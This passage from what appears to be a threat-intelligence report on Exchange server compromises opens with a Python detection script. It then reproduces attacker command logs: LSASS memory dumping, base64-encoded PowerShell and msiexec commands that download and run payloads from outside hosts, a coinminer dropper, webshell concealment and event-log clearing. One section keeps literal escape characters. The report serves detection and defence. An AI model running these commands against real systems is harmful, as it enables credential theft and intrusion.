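# rundll32 calling the MiniDump export of comsvcs.dll (the Minidump/Makecab attacker).
COMSVCS_MINIDUMP_RE = re.compile(
    r"rundll32(?:\.exe)?\s+.*?comsvcs\.dll[\s,]+MiniDump\b", re.IGNORECASE
)
# net group "<Exchange ... group>" <account> /del[ete]
NET_GROUP_DEL_RE = re.compile(
    r'\bnet(?:1|\.exe)?\s+group\s+"Exchange [^"]*"\s+\S+\s+/del(?:ete)?\b', re.IGNORECASE
)

# Detection names are the InsightIDR ABA names quoted in the post; the regexes are ours.
RULES = [
    ("Attacker Tool - China Chopper Webshell Executing Commands", CHINA_CHOPPER_RE),
    ("Attacker Technique - ProcDump Used Against LSASS", PROCDUMP_LSASS_RE),
    ("Attacker Technique - Minidump via COM Services DLL", COMSVCS_MINIDUMP_RE),
    ("Attacker Technique - Net Command Deleting Exchange Admin Group", NET_GROUP_DEL_RE),
]


def spawned_by_owa(event):
    """True when the process or its parent carries the OWA pool marker
    and the process is not the IIS worker itself."""
    if event["image"].lower().endswith(IIS_WORKER):
        return False
    return any(env.get(OWA_POOL_VAR) == OWA_POOL_VALUE
               for env in (event.get("env", {}), event.get("parent_env", {})))


def classify(event):
    """Names of the detections that fire for one process-creation event."""
    hits = [OWA_SPAWN] if spawned_by_owa(event) else []
    cmd = event.get("cmdline", "")
    hits.extend(name for name, pattern in RULES if pattern.search(cmd))
    return hits


def scan(events):
    """cmdline -> detections, for the events that produced at least one."""
    results = {}
    for event in events:
        hits = classify(event)
        if hits:
            results[event["cmdline"]] = hits
    return results


# Constructed events on a hypothetical Exchange host; field names are this example's own.
OWA_ENV = {OWA_POOL_VAR: OWA_POOL_VALUE}
CMD = r"C:\Windows\System32\cmd.exe"
SAMPLE_EVENTS = [
    # cmd.exe under the OWA worker, dumping LSASS with ProcDump (the post's first block).
    {"image": CMD, "env": OWA_ENV, "parent_env": OWA_ENV,
     "cmdline": r"cmd /c cd /d C:\root&procdump64.exe -accepteula -ma lsass.exe lsass.dmp&echo [S]&cd&echo [E]"},
    # Same origin, removing an account from an Exchange admin group.
    {"image": CMD, "env": OWA_ENV, "parent_env": OWA_ENV,
     "cmdline": r'cmd /c cd /d C:\inetpub\wwwroot\aspnet_client\system_web&net group "Exchange Organization administrators" administrator /del /domain&echo [S]&cd&echo [E]'},
    # Minidump/Makecab attacker: comsvcs.dll MiniDump through PowerShell started by the webshell.
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "env": OWA_ENV, "parent_env": OWA_ENV,
     "cmdline": r"powershell rundll32.exe c:\windows\system32\comsvcs.dll MiniDump 900 c:\inetpub\wwwroot\aspnet_client\x.tmp.dmp full"},
    # Plain tasklist from the webshell: no tool signature, only the OWA lineage gives it away.
    {"image": CMD, "env": OWA_ENV, "parent_env": OWA_ENV,
     "cmdline": r"c:\windows\system32\cmd.exe /c tasklist"},
    # The OWA worker itself: carries the marker but is not a finding.
    {"image": r"C:\Windows\System32\inetsrv\w3wp.exe", "env": OWA_ENV,
     "cmdline": r'c:\windows\system32\inetsrv\w3wp.exe -ap "MSExchangeOWAAppPool"'},
    # An administrator's console: same utility, no OWA lineage, nothing fires.
    {"image": CMD, "env": {}, "parent_env": {},
     "cmdline": r"cmd.exe /c tasklist"},
]

if __name__ == "__main__":
    for cmdline, hits in scan(SAMPLE_EVENTS).items():
        print(cmdline)
        for hit in hits:
            print("   ", hit)
```

The fourth sample event is the one worth noting: a bare `tasklist` carries no tool signature at all, and it is only the inherited `APP_POOL_ID` value that marks it as something the OWA worker should never have spawned. The command-line patterns catch the known tooling; the lineage check is what catches the attacker who changes tooling.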
\n\nUsing China Chopper, the attacker executed the Microsoft Sysinternals utility [procdump64.exe](<https://docs.microsoft.com/en-us/sysinternals/downloads/procdump>) against the lsass.exe process to copy the contents of its memory to a file on disk. This allows the attacker to retrieve and analyze this memory dump later with utilities such as [mimikatz](<https://github.com/gentilkiwi/mimikatz>) to [extract passwords from the memory dump of this process](<https://github.com/gentilkiwi/mimikatz/wiki/module-~-sekurlsa#minidump>). This enables this attacker to potentially come back to many of these victim email accounts at a later date if two-factor authentication is not employed. Additionally, even if reasonable password change policies are implemented at these victim locations, users will often rotate passwords in a predictable manner. For instance, if a password for a user is \u201cThisIsMyPassword1!\u201d, when forced to change, they will likely just increment the digit at the end to \u201cThisIsMyPassword2!\u201d. 
This makes it easy for attackers to guess the future passwords based on the predictability of human behavior.\n\nThe following commands were observed by Rapid7 being executed by the attacker known as HAFNIUM:\n\nProcdump.exe commands executed via China Chopper webshell to write the memory contents of the lsass.exe process to disk:\n \n \n cmd /c cd /d C:\\\\root&procdump64.exe -accepteula -ma lsass.exe lsass.dmp&echo [S]&cd&echo [E]\n cmd /c cd /d E:\\\\logs&procdump64.exe -accepteula -ma lsass.exe lsass.dmp&echo [S]&cd&echo [E]\n \n\nReconnaissance commands executed via China Chopper webshell to gather information about the Active Directory domain controllers, users, systems, and processes:\n \n \n cmd /c cd /d \"C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\V15\\\\FrontEnd\\\\HttpProxy\\\\owa\\\\auth&HOSTNAME\" & nltest /dclist:<REDACTED_DOMAIN>&echo [S]&cd&echo [E]\n cmd /c cd /d \"C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\V15\\\\FrontEnd\\\\HttpProxy\\\\owa\\\\auth&nltest\" /dclist:<REDACTED_DOMAIN>&echo [S]&cd&echo [E]\n cmd /c cd /d \"C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\V15\\\\FrontEnd\\\\HttpProxy\\\\owa\\\\auth&HOSTNAME\" & whoami & nltest /dclist:<REDACTED_DOMAIN>&echo [S]&cd&echo [E]\n cmd /c cd /d c:\\\\temp&tasklist&echo [S]&cd&echo [E]\n cmd /c cd /d E:\\\\logs&tasklist &echo [S]&cd&echo [E]\n cmd /c cd /d C:\\inetpub\\wwwroot\\aspnet_client\\system_web&net group \"Domain computers\" /do&echo [S]&cd&echo [E]\n cmd /c cd /d C:\\inetpub\\wwwroot\\aspnet_client\\system_web&tasklist /v&echo [S]&cd&echo [E]\n \n\nEnumeration of further information about specific processes on the victim system. 
The process smex_master.exe is from [Trend Micro\u2019s ScanMail](<https://www.trendmicro.com/en_us/business/products/user-protection/sps/email-and-collaboration/scanmail-for-exchange.html>) and unsecapp.exe is from [Microsoft Windows](<https://docs.microsoft.com/en-us/windows/win32/wmisdk/setting-security-on-an-asynchronous-call#setting-asynchronous-call-security-in-c>).\n \n \n cmd /c cd /d C:\\inetpub\\wwwroot\\aspnet_client\\system_web&wmic process where name=smex_master.exe get ExecutablePath,commandline&echo [S]&cd&echo [E]\n cmd /c cd /d C:\\inetpub\\wwwroot\\aspnet_client\\system_web&wmic process where name=unsecapp.exe get ExecutablePath&echo [S]&cd&echo [E]\n cmd /c cd /d C:\\inetpub\\wwwroot\\aspnet_client\\system_web&wmic process where name=unsecapp.exe get processid&echo [S]&cd&echo [E]\n \n \n\nDeletion of groups in Active Directory using the net.exe command executed via China Chopper:\n \n \n cmd /c cd /d C:\\\\inetpub\\\\wwwroot\\\\aspnet_client\\\\system_web&net group \"Exchange Organization administrators\" administrator /del /domain&echo [S]&cd&echo [E]\n \n\nNetwork connectivity check and/or egress IP address enumeration commands executed via China Chopper webshell:\n \n \n cmd /c cd /d \"C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\V15\\\\FrontEnd\\\\HttpProxy\\\\owa\\\\auth&ping\" -n 1 <REDACTED_HOSTNAME>&echo [S]&cd&echo [E]\n cmd /c cd /d \"C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\V15\\\\FrontEnd\\\\HttpProxy\\\\owa\\\\auth&ping\" -n 1 <REDACTED_HOSTNAME>&echo [S]&cd&echo [E]\n cmd /c cd /d C:\\inetpub\\wwwroot&ping -n 1 8.8.8.8&echo [S]&cd&echo [E]\n cmd /c cd /d C:\\inetpub\\wwwroot\\aspnet_client\\system_web&c:\\windows\\temp\\curl.exe -m 10 ipinfo.io&echo [S]&cd&echo [E]\n cmd /c cd /d C:\\inetpub\\wwwroot\\aspnet_client\\system_web&c:\\windows\\temp\\curl.exe -vv -k -m 10 https://www.google.com > C:\\windows\\temp\\b.log 2>&1&echo [S]&cd&echo [E]\n cmd /c cd /d C:\\inetpub\\wwwroot\\aspnet_client\\system_web&ping 
-n 1 ipinfo.io&echo [S]&cd&echo [E]\n cmd /c cd /d C:\\inetpub\\wwwroot\\aspnet_client\\system_web&ping -n 1 www.google.com&echo [S]&cd&echo [E]\n cmd /c cd /d c:\\\\temp&ping www.google.com&echo [S]&cd&echo [E]\n \n\nSecond-stage payload retrieval commands executed via China Chopper webshell:\n \n \n cmd /c cd /d C:\\\\inetpub\\\\wwwroot\\\\aspnet_client&msiexec /q /i http://103.212.223.210:9900/nvidia.msi&echo [S]&cd&echo [E]\n \n\nFilesystem interaction commands executed via China Chopper webshell to search file contents, hide, and delete files:\n \n \n \\cmd /c cd /d C:\\inetpub\\wwwroot\\aspnet_client\\system_web&findstr Request \"\\\\<REDACTED_HOSTNAME>\\C$\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\ErrorFF.aspx&echo\" [S]&cd&echo [E]\n cmd /c cd /d C:/inetpub/wwwroot/aspnet_client&attrib +h +s +r OutlookEN.aspx&echo [S]\n cmd /c cd /d C:/inetpub/wwwroot/aspnet_client&attrib +h +s +r TimeoutLogout.aspx&echo [S]\n cmd /c cd /d C:/inetpub/wwwroot/aspnet_client&del 'E:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\OutlookEN.aspx'&echo [S]\n cmd /c cd /d C:/inetpub/wwwroot/aspnet_client&del 'E:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\TimeoutLogout.aspx'&echo [S]\n \n\nInsightIDR Attacker Behavior Analytics that detect this attacker\u2019s activity:\n\n * Suspicious Process - Process Spawned By Outlook Web Access\n * Attacker Technique - Net Command Deleting Exchange Admin Group\n * Attacker Tool - China Chopper Webshell Executing Commands\n * Attacker Technique - ProcDump Used Against LSASS\n\n## MITRE ATT&CK techniques observed in HAFNIUM-related activity\n\n * [T1003](<https://attack.mitre.org/techniques/T1003/>) \\- OS Credential Dumping\n * [T1003.001](<https://attack.mitre.org/techniques/T1003/001/>) \\- OS Credential Dumping: LSASS Memory\n * [T1005](<https://attack.mitre.org/techniques/T1005>) \\- Data from Local System\n * 
[T1007](<https://attack.mitre.org/techniques/T1007>) \\- System Service Discovery\n * [T1033](<https://attack.mitre.org/techniques/T1033>) \\- System Owner/User Discovery\n * [T1041](<https://attack.mitre.org/techniques/T1041/>) \\- Exfiltration Over C2 Channel\n * [T1047](<https://attack.mitre.org/techniques/T1047>) \\- Windows Management Instrumentation\n * [T1057](<https://attack.mitre.org/techniques/T1057>) \\- Process Discovery\n * [T1059](<https://attack.mitre.org/techniques/T1059>) \\- Command and Scripting Interpreter\n * [T1059.003](<https://attack.mitre.org/techniques/T1059/003>) \\- Command and Scripting Interpreter: Windows Command Shell\n * [T1071](<https://attack.mitre.org/techniques/T1071>) \\- Application Layer Protocol\n * [T1071.001](<https://attack.mitre.org/techniques/T1071/001>) \\- Application Layer Protocol: Web Protocols\n * [T1074](<https://attack.mitre.org/techniques/T1074>) \\- Data Staged\n * [T1074.001](<https://attack.mitre.org/techniques/T1074/001>) \\- Data Staged: Local Data Staging\n * [T1083](<https://attack.mitre.org/techniques/T1083/>) \\- File and Directory Discovery\n * [T1087](<https://attack.mitre.org/techniques/T1087>) \\- Account Discovery\n * [T1087.001](<https://attack.mitre.org/techniques/T1087/001>) \\- Account Discovery: Local Account\n * [T1087.002](<https://attack.mitre.org/techniques/T1087/002>) \\- Account Discovery: Domain Account\n * [T1098](<https://attack.mitre.org/techniques/T1098>) \\- Account Manipulation\n * [T1105](<https://attack.mitre.org/techniques/T1105/>) \\- Ingress Tool Transfer\n * [T1190](<https://attack.mitre.org/techniques/T1190>) \\- Exploit Public-Facing Application\n * [T1203](<https://attack.mitre.org/techniques/T1203>) \\- Exploitation For Client Execution\n * [T1218](<https://attack.mitre.org/techniques/T1218>) \\- Signed Binary Proxy Execution\n * [T1218.007](<https://attack.mitre.org/techniques/T1218/007/>) \\- Signed Binary Proxy Execution: Msiexec\n * 
[T1505](<https://attack.mitre.org/techniques/T1505/>) - Server Software Component
 * [T1505.003](<https://attack.mitre.org/techniques/T1505/003/>) - Server Software Component: Web Shell
 * [T1518](<https://attack.mitre.org/techniques/T1518>) - Software Discovery
 * [T1518.001](<https://attack.mitre.org/techniques/T1518/001>) - Software Discovery: Security Software Discovery
 * [T1531](<https://attack.mitre.org/techniques/T1531>) - Account Access Removal
 * [T1583](<https://attack.mitre.org/techniques/T1583>) - Acquire Infrastructure
 * [T1583.003](<https://attack.mitre.org/techniques/T1583/003>) - Acquire Infrastructure: Virtual Private Server
 * [T1587](<https://attack.mitre.org/techniques/T1587>) - Develop Capabilities
 * [T1587.001](<https://attack.mitre.org/techniques/T1587/001>) - Develop Capabilities: Malware
 * [T1587.004](<https://attack.mitre.org/techniques/T1587/004>) - Develop Capabilities: Exploits
 * [T1588](<https://attack.mitre.org/techniques/T1588>) - Obtain Capabilities
 * [T1588.001](<https://attack.mitre.org/techniques/T1588/001>) - Obtain Capabilities: Malware
 * [T1588.002](<https://attack.mitre.org/techniques/T1588/002>) - Obtain Capabilities: Tool
 * [T1588.005](<https://attack.mitre.org/techniques/T1588/005>) - Obtain Capabilities: Exploits
 * [T1588.006](<https://attack.mitre.org/techniques/T1588/006>) - Obtain Capabilities: Vulnerabilities
 * [T1595](<https://attack.mitre.org/techniques/T1595>) - Active Scanning
 * [T1595.001](<https://attack.mitre.org/techniques/T1595/001>) - Active Scanning: Scanning IP Blocks
 * [T1595.002](<https://attack.mitre.org/techniques/T1595/002>) - Active Scanning: Vulnerability Scanning

## Non-HAFNIUM-related activity

Rapid7 has also observed, in recent weeks, several distinct types of post-exploitation activity following exploitation of these Exchange vulnerabilities by attackers other than HAFNIUM. We have grouped these and distilled the unique types of commands being executed into the individual sections below.

### Minidump and Makecab attacker

This attacker was seen uploading batch scripts to execute the Microsoft utility [dsquery.exe](<https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc732952(v=ws.11)>) to enumerate all users in the Active Directory domain. The attacker also used the [MiniDump function in comsvcs.dll](<https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dump-credentials-from-lsass-process-without-mimikatz#comsvcs-dll>) via rundll32.exe to write the memory of the lsass.exe process to disk, then used the built-in Microsoft utility [makecab.exe](<https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/makecab>) to compress the memory dump for more efficient retrieval. Overall, the data this attacker collects from victims overlaps with what others have reported for the actor known as HAFNIUM. However, the tools and techniques differ enough that the activity cannot easily be attributed to the same attacker without additional compelling links.

```
C:\Windows\System32\cmd.exe /c c:\inetpub\wwwroot\aspnet_client\test.bat
C:\Windows\System32\cmd.exe /c c:\inetpub\wwwroot\aspnet_client\test.bat
dsquery * -limit 0 -filter objectCategory=person -attr * -uco
powershell rundll32.exe c:\windows\system32\comsvcs.dll MiniDump 900 c:\inetpub\wwwroot\aspnet_client\<REDACTED_33_CHARACTER_STRING>.tmp.dmp full
makecab c:\inetpub\wwwroot\aspnet_client\<REDACTED_33_CHARACTER_STRING>.tmp.dmp c:\inetpub\wwwroot\aspnet_client\<REDACTED_33_CHARACTER_STRING>.dmp.zip
makecab c:\inetpub\wwwroot\aspnet_client\<REDACTED_33_CHARACTER_STRING>.tmp c:\inetpub\wwwroot\aspnet_client\<REDACTED_33_CHARACTER_STRING>.dmp.zip
```

InsightIDR Attacker Behavior Analytics that detect this attacker’s activity:

 * Suspicious Process - Process Spawned By Outlook Web Access
 * Attacker Technique - Minidump via COM Services DLL

### Malicious DLL attacker

This attacker was seen uploading and executing a DLL through rundll32.exe and redirecting the output to a text file. The demo.dll file is believed to have functionality similar to mimikatz or other hash/password dumping utilities. The attacker also used the net, netstat and tasklist utilities, along with [klist](<https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/klist>) to display cached Kerberos tickets. This again overlaps with the types of data collected by HAFNIUM, but the methods differ. Additionally, this is a commonly employed action for an attacker to take post-compromise.

```
c:\windows\system32\cmd.exe /c tasklist
tasklist
c:\windows\system32\cmd.exe /c net time /do
net time /do
c:\windows\system32\cmd.exe /c rundll32 c:\programdata\demo.dll,run -lm > c:\programdata\1.txt
rundll32 c:\programdata\demo.dll,run -lm > c:\programdata\1.txt
c:\windows\system32\cmd.exe /c klist
c:\windows\system32\cmd.exe /c tasklist
tasklist
c:\windows\system32\cmd.exe /c netstat -ano
netstat -ano
```

InsightIDR Attacker Behavior Analytics that detect this attacker’s activity:

 * Suspicious Process - Process Spawned By Outlook Web Access

### Opera Browser and Cobalt Strike attacker

This attacker was seen using common techniques to download scripts with Microsoft’s [BITSAdmin](<https://docs.microsoft.com/en-us/windows/win32/bits/bitsadmin-tool>). These scripts then executed encoded PowerShell commands that retrieved a legitimate version of the Opera Browser that has a known DLL search order vulnerability ([CVE-2018-18913](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18913>)). The attacker also retrieved malicious DLLs and other files and placed them in the same directory as the legitimate opera_browser.exe; when the browser was launched, it loaded the malicious DLL from that directory. The chain ended with the execution of [Cobalt Strike](<https://www.cobaltstrike.com/>), a tool favored by attackers who distribute ransomware:

```
C:\Windows\System32\bitsadmin.exe /rawreturn /transfer getfile http://89.34.111.11/3.avi c:\Users\public\2.bat
C:\Windows\System32\cmd.exe /c c:\Users\public\2.bat
powershell -enc KABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA4ADYALgAxADAANQAuADEAOAAuADEAMQA2AC8AbgBlAHcAcwAvAGMAbwBkAGUAJwAsACcAQwA6AFwAdQBzAGUAcgBzAFwAcAB1AGIAbABpAGMAXABvAHAAZQByAGEAXABjAG8AZABlACcAKQA=
powershell -enc KABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA4ADYALgAxADAANQAuADEAOAAuADEAMQA2AC8AbgBlAHcAcwAvAG8AcABlAHIAYQBfAGIAcgBvAHcAcwBlAHIALgBwAG4AZwAnACwAJwBDADoAXAB1AHMAZQByAHMAXABwAHUAYgBsAGkAYwBcAG8AcABlAHIAYQBcAG8AcABlAHIAYQBfAGIAcgBvAHcAcwBlAHIALgBwAG4AZwAnACkA
powershell -enc KABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA4ADYALgAxADAANQAuADEAOAAuADEAMQA2AC8AbgBlAHcAcwAvAG8AcABlAHIAYQBfAGIAcgBvAHcAcwBlAHIALgBkAGwAbAAnACwAJwBDADoAXAB1AHMAZQByAHMAXABwAHUAYgBsAGkAYwBcAG8AcABlAHIAYQBcAG8AcABlAHIAYQBfAGIAcgBvAHcAcwBlAHIALgBkAGwAbAAnACkA
msiexec.exe -k
powershell Start-Sleep -Seconds 10
cmd /c C:\users\public\opera\opera_browser.exe
C:\users\public\opera\opera_browser.exe
powershell -enc KABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA4ADYALgAxADAANQAuADEAOAAuADEAMQA2AC8AbgBlAHcAcwAvAG8AcABlAHIAYQBfAGIAcgBvAHcAcwBlAHIALgBlAHgAZQAnACwAJwBDADoAXAB1AHMAZQByAHMAXABwAHUAYgBsAGkAYwBcAG8AcABlAHIAYQBcAG8AcABlAHIAYQBfAGIAcgBvAHcAcwBlAHIALgBlAHgAZQAnACkA
```

Base64 decoded strings passed to PowerShell:

```
(new-object System.Net.WebClient).DownloadFile('http://86.105.18.116/news/code','C:\users\public\opera\code')
(new-object System.Net.WebClient).DownloadFile('http://86.105.18.116/news/opera_browser.png','C:\users\public\opera\opera_browser.png')
(new-object System.Net.WebClient).DownloadFile('http://86.105.18.116/news/opera_browser.dll','C:\users\public\opera\opera_browser.dll')
(new-object System.Net.WebClient).DownloadFile('http://86.105.18.116/news/opera_browser.exe','C:\users\public\opera\opera_browser.exe')
```

InsightIDR Attacker Behavior Analytics that detect this attacker’s activity:

 * Suspicious Process - Process Spawned By Outlook Web Access
 * Attacker Technique - Download And Execute With Background Intelligent Transfer Service
 * Attacker Technique - URL Passed To BitsAdmin

### Six-character webshell attacker

This attacker was seen uploading webshells and copying them to other locations within the webroot.

```
cmd /c copy C:\inetpub\wwwroot\aspnet_client\discover.aspx "C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\<REDACTED_6_CHARACTER_STRING>.aspx"
```

InsightIDR Attacker Behavior Analytics that detect this attacker’s activity:

 * Suspicious Process - Process Spawned By Outlook Web Access

### Encoded PowerShell download cradle attacker

This attacker was seen executing encoded PowerShell commands that would download malware from a remote location.
They would also execute the [getmac.exe](<https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/getmac>) utility to enumerate information about the network adapters.

```
cmd.exe /c powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AcAAuAGUAcwB0AG8AbgBpAG4AZQAuAGMAbwBtAC8AcAA/AGUAJwApAA==
C:\Windows\system32\getmac.exe /FO CSV
```

Base64 decoded strings passed to PowerShell:

```
IEX (New-Object Net.WebClient).downloadstring('http://p.estonine.com/p?e')
```

InsightIDR Attacker Behavior Analytics that detect this attacker’s activity:

 * Suspicious Process - Process Spawned By Outlook Web Access
 * Attacker Technique - PowerShell Download Cradles

### Ten-character webshell attacker

This attacker was seen uploading webshells and using icacls to recursively set the permissions of the webroot directory to read-only. Additionally, the attacker used the attrib.exe utility to mark the webshell file as hidden and system, making it harder to find.

```
C:\Windows\System32\cmd.exe /c move "c:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\error.aspx" "c:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\<REDACTED_10_CHARACTER_STRING>.aspx"
C:\Windows\System32\cmd.exe /c icacls "c:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth" /inheritance:r /grant:r Everyone:(OI)(CI)R
C:\Windows\System32\cmd.exe /c =attrib "c:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\<REDACTED_10_CHARACTER_STRING>.aspx" +s +h
attrib "c:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\<REDACTED_10_CHARACTER_STRING>.aspx" +s +h
C:\Windows\System32\cmd.exe /c icacls "c:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\ecp\auth" /inheritance:r /grant:r Everyone:(OI)(CI)R
```

InsightIDR Attacker Behavior Analytics that detect this attacker’s activity:

 * Suspicious Process - Process Spawned By Outlook Web Access
 * Attacker Technique - Modification Of Files In Exchange Webroot

### 7zip and NetSupport Manager attacker

This attacker used the [7zip](<https://www.7-zip.org/>) compression utility (renamed to MonitoringLog.exe) and the [NetSupport Manager](<https://www.netsupportsoftware.com/remote-control/>) remote access tool (client32.exe). These utilities were most likely retrieved by the script1.ps1 PowerShell script and were located within a password-protected archive named Service.Information.rtf. Once extracted, they were executed:

```
c:\windows\system32\cmd.exe dir C:\Programdata\
c:\windows\system32\cmd.exe /c powershell C:\Programdata\script1.ps1
powershell C:\Programdata\script1.ps1
C:\ProgramData\MonitoringLog.exe x -p<REDACTED_STRING> -y C:\ProgramData\Service.Information.rtf -oC:\ProgramData
ping -n 10 127.0.0.1
c:\windows\system32\cmd.exe /c C:\Programdata\MonitoringLog.cmd
taskkill /Im rundll32.exe /F
C:\ProgramData\NetConnections\client32.exe
ping -n 10 127.0.0.1
taskkill /Im rundll32.exe /F
c:\windows\system32\cmd.exe /c tasklist /v
tasklist /v
```

InsightIDR Attacker Behavior Analytics that detect this attacker’s activity:

 * Suspicious Process - Process Spawned By Outlook Web Access

### Event log deletion and virtual directory creation attacker

This attacker created virtual directories within the existing webroot using the Microsoft utility [appcmd.exe](<https://docs.microsoft.com/en-us/iis/get-started/getting-started-with-iis/getting-started-with-appcmdexe>), and then cleared all event logs on the system using [wevtutil.exe](<https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil>):

```
CMD C:\Windows\System32\inetsrv\appcmd.exe add vdir "/app.name:Default Web Site/" "/path:/owa/auth/ /zfwqn" /physicalPath:C:\ProgramData\COM\zfwqn

CMD /c for /f %x in ('wevtutil el') do wevtutil cl %x
wevtutil el
wevtutil cl <REDACTED_ALL_DIFFERENT_EVENT_LOGS>
```

InsightIDR Attacker Behavior Analytics that detect this attacker’s activity:

 * Suspicious Process - Process Spawned By Outlook Web Access
 * Attacker Technique - Clearing Event Logs With WEvtUtil

### Webshell enumeration attacker

This attacker was seen executing encoded PowerShell commands to run the [type](<https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/type>) command and view the contents of possible webshell files named outlooken.aspx, a name seen used by HAFNIUM and other attackers. This could be someone looking to reuse the footholds placed by other attackers, or even researchers using the same exploit to identify systems that were already compromised, based on the reported activity associated with HAFNIUM:

```
cmd /c powershell -enc YwBtAGQALgBlAHgAZQAgAC8AYwAgACIAdAB5AHAAZQAgACIAIgBDADoAXABQAHIAbwBnAHIAYQBtACAARgBpAGwAZQBzAFwATQBpAGMAcgBvAHMAbwBmAHQAXABFAHgAYwBoAGEAbgBnAGUAIABTAGUAcgB2AGUAcgBcAFYAMQA1AFwARgByAG8AbgB0AEUAbgBkAFwASAB0AHQAcABQAHIAbwB4AHkAXABvAHcAYQBcAGEAdQB0AGgAXABvAHUAdABsAG8AbwBrAGUAbgAuAGEAcwBwAHgAIgAiACIA
cmd /c powershell -enc dAB5AHAAZQAgACIAQwA6AFwAUAByAG8AZwByAGEAbQAgAEYAaQBsAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwARQB4AGMAaABhAG4AZwBlACAAUwBlAHIAdgBlAHIAXABWADEANQBcAEYAcgBvAG4AdABFAG4AZABcAEgAdAB0AHAAUAByAG8AeAB5AFwAbwB3AGEAXABhAHUAdABoAFwAbwB1AHQAbABvAG8AawBlAG4ALgBhAHMAcAB4ACIA
```

Base64 decoded strings:

```
type "C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\outlooken.aspx"
```

InsightIDR Attacker Behavior Analytics that detect this attacker’s activity:

 * Suspicious Process - Process Spawned By Outlook Web Access

### Coinminer dropper attacker

Some attackers were seen using PowerShell to retrieve and execute coinminers.

```
cmd.exe /c powershell.exe Invoke-WebRequest http://microsoftsoftwaredownload.com:8080/m103w.zip -OutFile C:\windows\temp\dsf.exe & C:\windows\temp\dsf.exe RS9+cn_0 & del C:\windows\temp\dsf.exe
powershell.exe Invoke-WebRequest http://microsoftsoftwaredownload.com:8080/m103w.zip -OutFile C:\windows\temp\dsf.exe
C:\windows\temp\dsf.exe RS9+cn_0
```

And again, retrieving a slightly different filename:

```
cmd.exe /c powershell.exe Invoke-WebRequest http://microsoftsoftwaredownload.com:8080/c103w-at.zip -OutFile C:\windows\temp\dsf.exe & C:\windows\temp\dsf.exe RS9+cn_0 & del C:\windows\temp\dsf.exe
powershell.exe Invoke-WebRequest http://microsoftsoftwaredownload.com:8080/c103w-at.zip
C:\windows\temp\dsf.exe RS9+cn_0
```

InsightIDR Attacker Behavior Analytics that detect this attacker’s activity:

 * Suspicious Process - Process Spawned By Outlook Web Access

### Simple reconnaissance attacker(s)

Some attackers were seen running very simple reconnaissance commands to gather more information about the host, processes, users, and systems within Active Directory:

```
net group /domain
net group "Domain Computers" /do
net group "Domain Users" /do
net group IntranetAdmins /do
net user /domain
systeminfo
tasklist
```

Another example where only simple recon-type commands were executed:

```
whoami
systeminfo
systeminfo
wmic product get name
Wmic product get name
```

InsightIDR Attacker Behavior Analytics that detect this attacker’s activity:

 * Suspicious Process - Process Spawned By Outlook Web Access

## Conclusions

While there was widespread exploitation of these vulnerabilities in the wild, it does appear that this was the work of several different attackers with different motivations and skills. Rapid7 even observed exploitation of the same victim by multiple actors (HAFNIUM and coinminer droppers) within a two-week timeframe. Several attackers used these vulnerabilities to gather passwords and hashes from victim systems en masse, giving them data from many victims that grants access to various Active Directory services for as long as the gathered credentials remain unchanged.

Credentials may have been dumped at this scale because the attackers were aware the activity would be discovered and the vulnerability patched very soon; the stolen credentials would potentially let them keep accessing these accounts even after the systems were patched. The escalation in use by HAFNIUM and the subsequent use by several other actors may point to the same exploit being shared or leaked. **At the time of this writing, Rapid7 has no definitive evidence of this and acknowledges that this statement is speculative.**

